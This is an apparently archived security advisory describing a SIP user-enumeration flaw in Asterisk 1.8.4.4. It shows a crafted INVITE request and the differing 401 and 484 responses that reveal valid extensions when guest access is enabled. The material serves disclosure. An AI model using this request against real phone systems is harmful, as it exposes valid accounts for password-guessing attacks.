exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Asterisk 1.8.x SIP User Enumeration

Asterisk 1.8.x SIP User Enumeration
Posted Jun 30, 2011
Authored by Francesco Tornieri

The INVITE method in use by Asterisk version 1.8.4.4 allows for remote user enumeration.

tags | exploit, remote
SHA-256 | c8d09e1a6bc234ffc02445e7446b5216f7017ea2bb2d57463d5af6d921a8ff5c

Asterisk 1.8.x SIP User Enumeration

Change Mirror Download
Asterisk 1.8.4.4, sip response permit username identification through use INVITE 

Author: francesco.tornieri \"At\" verona-wireless.net
Summary: Sip responses permit user identification
Reference: https://downloads.asterisk.org/pub/security/AST-2011-011.pdf
Release Date: 30/06/2011
Criticality level: Low
Impact: Information leak
Software: Asterisk 1.8.4.4

Description:
In the last release (1.8.4.4) the Digium's developers have added a patch to mitigate extensions enumeration but it's still possible to enumerate it through use of craft INVITE method (it's only work if "allowguest=yes").

Example:
PBX Asterisk:
----------
sip.conf
----------
[general]
context=outgoing
port=5060
bindaddr=127.0.0.1
realm=asterisk
allowguest=yes <----
alwaysauthreject=yes <----

[template](!)
type=friend
canreinvite=no
host=dynamic
qualify=1000
disallow=all
allow=g729

[500](template)
callerid=phone200<500>
username=500
secret=password

------------------------
Craft Sip INVITE example
------------------------
INVITE sip:500@127.0.0.1 SIP/2.0
CSeq: 123 INVITE
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
From: <sip:500@127.0.0.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 571579d6e5814dff04ac7cd42672738f
To: <sip:500@127.0.0.1>

----------------
Method: REGISTER
----------------
Valid user (user 500)
Response:
---
SIP/2.0 401 Unauthorized
---

Invalid user (user 501)
Response:
---
SIP/2.0 484 Address Incomplete
---

Francesco Tornieri
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close